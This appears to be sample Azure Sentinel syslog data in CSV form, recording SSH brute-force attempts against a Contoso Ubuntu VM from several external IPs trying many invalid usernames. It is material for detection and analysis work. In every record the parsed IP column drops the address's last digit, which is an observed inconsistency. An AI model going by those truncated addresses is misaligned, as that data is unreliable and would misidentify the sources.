+10266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:07:24,UbuntuDevEnv,2019-06-25 23:07:23,auth,UbuntuDevEnv,info,Invalid user oracle-db from 77.232.128.87 port 38549,54252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,77.232.128.8,38549,,
+10267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:07:24,UbuntuDevEnv,2019-06-25 23:07:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:07:24,UbuntuDevEnv,2019-06-25 23:07:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,54252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:07:26,UbuntuDevEnv,2019-06-25 23:07:25,auth,UbuntuDevEnv,info,Failed password for invalid user oracle-db from 77.232.128.87 port 38549 ssh2,54252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,77.232.128.8,38549,,
+10270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:07:26,UbuntuDevEnv,2019-06-25 23:07:25,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle-db 77.232.128.87 port 38549 [preauth],54252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,77.232.128.8,38549,,
+10271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:07:26,UbuntuDevEnv,2019-06-25 23:07:25,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 38549:11: Bye Bye [preauth],54252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,38549,,
+10272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:07:33,UbuntuDevEnv,2019-06-25 23:07:32,auth,UbuntuDevEnv,info,Invalid user cmschine from 66.70.130.155 port 37002,54283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cmschine,66.70.130.1,37002,,
+10273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:07:33,UbuntuDevEnv,2019-06-25 23:07:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:07:33,UbuntuDevEnv,2019-06-25 23:07:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,54283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+10275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:07:35,UbuntuDevEnv,2019-06-25 23:07:34,auth,UbuntuDevEnv,info,Failed password for invalid user cmschine from 66.70.130.155 port 37002 ssh2,54283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cmschine,66.70.130.1,37002,,
+10276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:07:35,UbuntuDevEnv,2019-06-25 23:07:34,auth,UbuntuDevEnv,info,Disconnected from invalid user cmschine 66.70.130.155 port 37002 [preauth],54283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cmschine,66.70.130.1,37002,,
+10277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:07:35,UbuntuDevEnv,2019-06-25 23:07:34,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 37002:11: Bye Bye [preauth],54283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,37002,,
+10278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:08:16,UbuntuDevEnv,2019-06-25 23:08:15,auth,UbuntuDevEnv,info,Invalid user operador from 138.68.12.43 port 39842,54432,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operador,138.68.12.4,39842,,
+10279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:08:16,UbuntuDevEnv,2019-06-25 23:08:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54432,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:08:16,UbuntuDevEnv,2019-06-25 23:08:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,54432,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:08:18,UbuntuDevEnv,2019-06-25 23:08:18,auth,UbuntuDevEnv,info,Failed password for invalid user operador from 138.68.12.43 port 39842 ssh2,54432,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operador,138.68.12.4,39842,,
+10282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:08:18,UbuntuDevEnv,2019-06-25 23:08:18,auth,UbuntuDevEnv,info,Disconnected from invalid user operador 138.68.12.43 port 39842 [preauth],54432,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operador,138.68.12.4,39842,,
+10283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:08:18,UbuntuDevEnv,2019-06-25 23:08:18,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 39842:11: Bye Bye [preauth],54432,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,39842,,
+10284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:08:56,UbuntuDevEnv,2019-06-25 23:08:55,auth,UbuntuDevEnv,info,Invalid user albertha from 77.232.128.87 port 47076,54583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,albertha,77.232.128.8,47076,,
+10285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:08:56,UbuntuDevEnv,2019-06-25 23:08:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:08:56,UbuntuDevEnv,2019-06-25 23:08:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,54583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:08:58,UbuntuDevEnv,2019-06-25 23:08:57,auth,UbuntuDevEnv,info,Failed password for invalid user albertha from 77.232.128.87 port 47076 ssh2,54583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,albertha,77.232.128.8,47076,,
+10288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:08:58,UbuntuDevEnv,2019-06-25 23:08:57,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 47076:11: Bye Bye [preauth],54583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,47076,,
+10289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:08:58,UbuntuDevEnv,2019-06-25 23:08:57,auth,UbuntuDevEnv,info,Disconnected from invalid user albertha 77.232.128.87 port 47076 [preauth],54583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,albertha,77.232.128.8,47076,,
+10290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:10:22,UbuntuDevEnv,2019-06-25 23:10:21,auth,UbuntuDevEnv,info,Invalid user chan from 138.68.12.43 port 56042,54882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chan,138.68.12.4,56042,,
+10291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:10:22,UbuntuDevEnv,2019-06-25 23:10:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:10:22,UbuntuDevEnv,2019-06-25 23:10:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,54882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:10:24,UbuntuDevEnv,2019-06-25 23:10:23,auth,UbuntuDevEnv,info,Failed password for invalid user chan from 138.68.12.43 port 56042 ssh2,54882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chan,138.68.12.4,56042,,
+10294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:10:24,UbuntuDevEnv,2019-06-25 23:10:24,auth,UbuntuDevEnv,info,Disconnected from invalid user chan 138.68.12.43 port 56042 [preauth],54882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chan,138.68.12.4,56042,,
+10295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:10:24,UbuntuDevEnv,2019-06-25 23:10:24,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 56042:11: Bye Bye [preauth],54882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,56042,,
+10296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:10:28,UbuntuDevEnv,2019-06-25 23:10:28,auth,UbuntuDevEnv,info,Invalid user temp from 77.232.128.87 port 55604,54912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,77.232.128.8,55604,,
+10297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:10:28,UbuntuDevEnv,2019-06-25 23:10:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:10:28,UbuntuDevEnv,2019-06-25 23:10:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,54912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:10:30,UbuntuDevEnv,2019-06-25 23:10:30,auth,UbuntuDevEnv,info,Failed password for invalid user temp from 77.232.128.87 port 55604 ssh2,54912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,77.232.128.8,55604,,
+10300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:10:30,UbuntuDevEnv,2019-06-25 23:10:30,auth,UbuntuDevEnv,info,Disconnected from invalid user temp 77.232.128.87 port 55604 [preauth],54912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,77.232.128.8,55604,,
+10301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:10:30,UbuntuDevEnv,2019-06-25 23:10:30,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 55604:11: Bye Bye [preauth],54912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,55604,,
+10302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:12:00,UbuntuDevEnv,2019-06-25 23:12:00,auth,UbuntuDevEnv,info,Invalid user marek from 77.232.128.87 port 35896,55237,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marek,77.232.128.8,35896,,
+10303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:12:00,UbuntuDevEnv,2019-06-25 23:12:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55237,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:12:00,UbuntuDevEnv,2019-06-25 23:12:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,55237,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:12:03,UbuntuDevEnv,2019-06-25 23:12:02,auth,UbuntuDevEnv,info,Failed password for invalid user marek from 77.232.128.87 port 35896 ssh2,55237,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marek,77.232.128.8,35896,,
+10306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:12:03,UbuntuDevEnv,2019-06-25 23:12:02,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 35896:11: Bye Bye [preauth],55237,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,35896,,
+10307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:12:03,UbuntuDevEnv,2019-06-25 23:12:02,auth,UbuntuDevEnv,info,Disconnected from invalid user marek 77.232.128.87 port 35896 [preauth],55237,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marek,77.232.128.8,35896,,
+10308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:12:33,UbuntuDevEnv,2019-06-25 23:12:32,auth,UbuntuDevEnv,info,Invalid user ccapp from 138.68.12.43 port 44002,55349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ccapp,138.68.12.4,44002,,
+10309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:12:33,UbuntuDevEnv,2019-06-25 23:12:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,55349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:12:33,UbuntuDevEnv,2019-06-25 23:12:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:12:34,UbuntuDevEnv,2019-06-25 23:12:34,auth,UbuntuDevEnv,info,Failed password for invalid user ccapp from 138.68.12.43 port 44002 ssh2,55349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ccapp,138.68.12.4,44002,,
+10312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:12:35,UbuntuDevEnv,2019-06-25 23:12:34,auth,UbuntuDevEnv,info,Disconnected from invalid user ccapp 138.68.12.43 port 44002 [preauth],55349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ccapp,138.68.12.4,44002,,
+10313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:12:35,UbuntuDevEnv,2019-06-25 23:12:34,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 44002:11: Bye Bye [preauth],55349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,44002,,
+10314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:13:33,UbuntuDevEnv,2019-06-25 23:13:33,auth,UbuntuDevEnv,info,Invalid user jhon from 77.232.128.87 port 44424,55562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jhon,77.232.128.8,44424,,
+10315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:13:33,UbuntuDevEnv,2019-06-25 23:13:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:13:33,UbuntuDevEnv,2019-06-25 23:13:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,55562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:13:35,UbuntuDevEnv,2019-06-25 23:13:35,auth,UbuntuDevEnv,info,Failed password for invalid user jhon from 77.232.128.87 port 44424 ssh2,55562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jhon,77.232.128.8,44424,,
+10318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:13:35,UbuntuDevEnv,2019-06-25 23:13:35,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 44424:11: Bye Bye [preauth],55562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,44424,,
+10319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:13:35,UbuntuDevEnv,2019-06-25 23:13:35,auth,UbuntuDevEnv,info,Disconnected from invalid user jhon 77.232.128.87 port 44424 [preauth],55562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jhon,77.232.128.8,44424,,
+10320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:14:18,UbuntuDevEnv,2019-06-25 23:14:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61  user=list,55727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,list,196.27.127.6,,0,
+10321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:14:20,UbuntuDevEnv,2019-06-25 23:14:20,auth,UbuntuDevEnv,info,Failed password for list from 196.27.127.61 port 39741 ssh2,55727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,39741,,
+10322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:14:21,UbuntuDevEnv,2019-06-25 23:14:20,auth,UbuntuDevEnv,info,Disconnected from authenticating user list 196.27.127.61 port 39741 [preauth],55727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,list,196.27.127.6,39741,,
+10323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:14:21,UbuntuDevEnv,2019-06-25 23:14:20,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 39741:11: Bye Bye [preauth],55727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,39741,,
+10324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:14:50,UbuntuDevEnv,2019-06-25 23:14:49,auth,UbuntuDevEnv,info,Invalid user knoxville from 138.68.12.43 port 60192,55831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,knoxville,138.68.12.4,60192,,
+10325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:14:50,UbuntuDevEnv,2019-06-25 23:14:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,55831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
